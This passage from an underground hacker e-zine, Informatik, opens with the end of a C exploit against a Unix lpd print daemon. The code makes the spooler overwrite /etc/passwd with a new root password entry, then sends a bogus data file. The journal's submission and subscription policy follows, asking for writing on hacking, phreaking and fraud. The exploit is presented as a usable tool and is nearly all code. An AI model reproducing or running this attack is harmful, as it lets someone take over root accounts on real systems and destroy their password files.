  2930.                fprintf(stderr, "Error connecting socket.\n");
  2931.                exit(1);
  2932.        }
  2933.        /* lp must be a valid printer destination */ write(s, "\2lp\n", 4);
  2934.        read(s, &c, 1);
  2935.        if(c) {
  2936.                fprintf(stderr, "Error %d on queuejob.\n", c);
  2937.                exit(1);
  2938.        }
  2939.        /* give alternitive spooling file */
  2940.        sprintf(buf, "\3%ld /etc/passwd\n", loadlen);
  2941.        write(s, buf, strlen(buf));
  2942.        read(s, &c, 1);
  2943.        if(c) {
  2944.                fprintf(stderr, "Error %d on /etc/passwd creation.\n", c);
  2945.                exit(1);
  2946.        }
  2947.        /* write out new root password entry */
  2948.        write(s, bufload, loadlen);
  2949.        write(s, "", 1);
  2950.        read(s, &c, 1);
  2951.        if(c) {
  2952.                fprintf(stderr, "Error %d after overwrite.\n", c);
  2953.                exit(1);
  2954.        }
  2955.        /* bogus data file entry */
  2956.        sprintf(buf, "\3%ld %s\n", 10L, "dfA000xxxxxxxxx");
  2957.        write(s, buf, strlen(buf));
  2958.        read(s, &c, 1);
  2959.        if(c) {
  2960.                fprintf(stderr, "Error %d on df file\n", c);
  2961.                exit(1);
  2962.        }
  2963.        write(s, "xxxxxxxxxx", 10);
  2964.        write(s, "", 1);
  2965.        read(s, &c, 1);
  2966.        if(c) {
  2967.                fprintf(stderr, "Error %d at last overwrite.\n", c);
  2968.                exit(1);
  2969.        }
  2970.        exit(0);
  2971. }
  2972.  
  2973.  
  2974.  
  2975.  
  2976.  
  2977. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2978.  
  2979.  
  2980.  
  2981.  
  2982.                   Informatik Submission & Subscription Policy
  2983.                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2984.  
  2985.  
  2986.  
  2987.      Informatik is an ongoing electronic journal, and thus we are faced with
  2988. the ever present need for a steady influx of new material.  If you have an
  2989. area of interest or expertise that you would like to write about, please do
  2990. not hesitate to contribute!  We depend on reader submissions!!  We do ask that
  2991. any submissions fit the following guidelines...
  2992.  
  2993. General Content
  2994. ~~~~~~~~~~~~~~
  2995.      Material for Informatik should concern information of interest to the
  2996.      computer underground community.  Examples of this include, but are by no
  2997.      means limited to hacking and phreaking, governmental agencies, fraud,
  2998.      clandestine activity, abuse of technology, recent advances in computing
  2999.      or telecommunications technology, and other of information not readily
  3000.      available to the public.  Please include a title and author name.
  3001.  
  3002. Text Format
  3003. ~~~~~~~~~~
  3004.      * standard ASCII test
  3005.      * 79 characters per line
  3006.      * no TAB codes
  3007.      * no special or system specific characters
  3008.      * mixed case type
  3009.      * single spaced, double space between paragraphs
  3010.      * no pagination
  3011.  
  3012. News submissions
  3013. ~~~~~~~~~~~~~~~
  3014.      * Submit only recent news items
  3015.      * Include the headline or title of the article
  3016.                the author's name (if given)
  3017.                the publication of origin
  3018.                the date of publication
  3019.      * Don't submit news that has appeared in other e-text journals
  3020.  
  3021. Subscription policy
  3022. ~~~~~~~~~~~~~~~~~~
  3023.      We are happy to provide an Internet based subscription service to our
  3024. readers.  To be on our mailout list, send mail to our Internet address,
  3025. "inform@doc.cc.utexas.edu" and include the word subscription in the subject
  3026. of your message.  If you requested a subscription before, you need to reply
  3027. again, because the old subscription list was deleted by MH.
  3028.  
  3029. Back Issues
  3030. ~~~~~~~~~~
  3031.      Back issues of Informatik are available via ftp at ftp.eff.org in the
  3032. /pub/cud/inform directory.  The site also contains a plethora of other
  3033. electronic texts of interest to the "computer underground" community including
  3034. Phrack, NIA, PHUN, and the LOD tech journals.
  3035.  
  3036.